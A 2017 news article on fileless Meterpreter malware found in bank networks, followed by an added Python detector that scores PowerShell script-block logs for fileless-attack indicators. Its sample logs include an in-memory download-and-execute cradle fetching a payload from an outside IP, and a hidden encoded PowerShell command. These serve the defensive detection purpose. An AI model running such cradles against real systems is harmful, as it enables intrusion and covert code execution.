By James Walker Feb 8, 2017 in Technology

A dangerous strain of malware is going mainstream and targeting banks around the world, security researchers have warned today. Attackers have created malware that doesn't store any files, making it virtually undetectable.

Usually, malware is loaded from a computer's hard drive when it starts up. Security software can provide protection by periodically scanning connected drives for previously identified threats. Researchers can begin more detailed investigations by looking for suspect files.

Undetectable malware

Fileless malware is stored entirely in a computer's working memory. Because it doesn't use the filesystem, it's virtually undetectable. It can run for months without anyone noticing, injecting itself into RAM and remaining active until the computer's shutdown.

While highly successful, the complexities of the approach have so far prevented it seeing significant use. However, the technique is now becoming more mainstream, security researchers from Kaspersky Labs reported today. The company has found a form of fileless malware called Meterpreter in 140 networks across 40 countries. The affected systems are predominantly owned by banks and enterprises.

Hijacking system tools

Meterpreter goes the extra mile in covering its tracks. It injects itself into the target's memory by using genuine system administration tools. Kaspersky discovered it frequently uses malicious Windows PowerShell scripts to hijack machines. The scripts assign memory to Meterpreter and then download the malware straight into RAM.

Kaspersky only discovered Meterpreter in late 2016. It was contacted by a bank after its security team found Meterpreter actively running inside Windows' domain controller, a legitimate part of the operating system. Kaspersky stepped in to complete a forensic investigation, ascertaining that the program was completely fileless.

The company successfully restored a copy of the utility from memory by analysing error dumps from the infected machines. It determined the contents of the malicious PowerShell scripts too, enabling it to piece together how the attack runs to completion. It's still unclear how the PowerShell scripts were delivered to the machines.

Fileless malware heads to the wild

Meterpreter is concerning because it's the first time fileless malware has been used to successfully orchestrate large-scale cyberattacks on major organisations. The hackers behind the malware were using it to force money out of banks, installing the malware on computers operating automatic teller machines.

Less than two years ago, security firm Trend Micro reported that fileless malware had been spotted in the wild for the first time. It warned that more malware creators would be adopting the technique soon. According to Kaspersky, that's now very much the case. It said incidents of fileless attacks are rising as the technique becomes more widespread.

"Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry," the company said. "Unfortunately the use of common tools combined with different tricks makes detection very hard. In fact, detection of this attack would be possible in RAM, network and registry only."

Consumer impact

Fileless malware is less likely to be such a significant concern on desktop PCs. RAM is volatile storage so its contents are deleted each time you reboot. Because PCs are typically rebooted on a daily basis, fileless attacks are less likely to be a success when targeting home users.

However, servers running corporate networks are designed for continuous operation, rebooting only if a fault is encountered. The malware can expect to persist in RAM indefinitely, safe in the knowledge it's almost completely invisible to the outside world. These attacks are therefore likely to concentrate on enterprise systems for the foreseeable future. Fileless invasions of always-on mobile devices and IoT products are also a possibility.
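Since the article notes that an attack of this kind leaves nothing on disk and is only detectable in RAM, on the network and in the registry, one practical place a defender can look is PowerShell script block logging. The following is an added example, not code from the article or from Kaspersky: it scores constructed script-block log lines (an assumed key=value layout, not a real log format) for the pattern described above, a script that allocates memory and pulls a payload straight into it, and alerts only when several weak indicators coincide.

```python
import re

# Weighted indicators. Each is weak alone (admins download files too); the
# combination the article describes, allocating memory and pulling a payload
# straight into it, is what pushes a script block over the alert threshold.
INDICATORS = {
    "download_cradle": (re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I), 2),
    "in_memory_exec":  (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "memory_alloc":    (re.compile(r"VirtualAlloc|AllocHGlobal|Reflection\.Assembly\]::Load", re.I), 3),
    "encoded_cmd":     (re.compile(r"-enc(odedcommand)?\s", re.I), 3),
    "hidden_window":   (re.compile(r"-w(indowstyle)?\s+hidden|-NonI(nteractive)?\b", re.I), 2),
}
ALERT_THRESHOLD = 5
# Assumed log layout (constructed for this example): key=value fields with the
# logged script block in a quoted "script" field, as a 4104 forwarder might emit.
LOG_RE = re.compile(r'host=(?P<host>\S+) eid=4104 user=(?P<user>\S+) script="(?P<script>.*)"$')

def score_script(script):
    """Return (score, matched indicator names) for one logged script block."""
    hits = [name for name, (pat, _) in INDICATORS.items() if pat.search(script)]
    score = sum(INDICATORS[h][1] for h in hits)
    if "memory_alloc" in hits and "download_cradle" in hits:
        score += 3  # bonus: allocate + fetch in one block, the fileless pattern
    return score, hits

def scan(lines):
    """Parse script-block log lines; return dicts for those at/above threshold."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # not a script-block event, or an unexpected layout
        score, hits = score_script(m["script"])
        if score >= ALERT_THRESHOLD:
            findings.append({"host": m["host"], "user": m["user"], "score": score, "hits": hits})
    return findings

# Constructed sample log lines (not real telemetry): routine admin activity, a
# legitimate download to disk, an in-memory loader, and a hidden encoded command.
SAMPLE_LOGS = [
    'ts=2017-02-08T03:12:44Z host=DC01 eid=4104 user=svc_backup script="Get-ChildItem C:\\Backups | Measure-Object"',
    'ts=2017-02-08T03:12:50Z host=DC01 eid=4104 user=admin script="Invoke-WebRequest https://updates.example.com/hotfix.msu -OutFile C:\\tmp\\hotfix.msu"',
    "ts=2017-02-08T03:14:02Z host=DC01 eid=4104 user=svc_backup script=\"$buf=[Runtime.InteropServices.Marshal]::AllocHGlobal(65536); IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/stage')\"",
    'ts=2017-02-08T03:15:10Z host=ATM-17 eid=4104 user=SYSTEM script="powershell -NoP -NonI -W Hidden -Enc <base64-omitted>"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"ALERT host={f['host']} user={f['user']} score={f['score']} hits={f['hits']}")
```

The legitimate download to disk stays below the threshold on purpose; the scoring is meant to surface the combination of memory allocation and in-memory download rather than any single command that administrators also use.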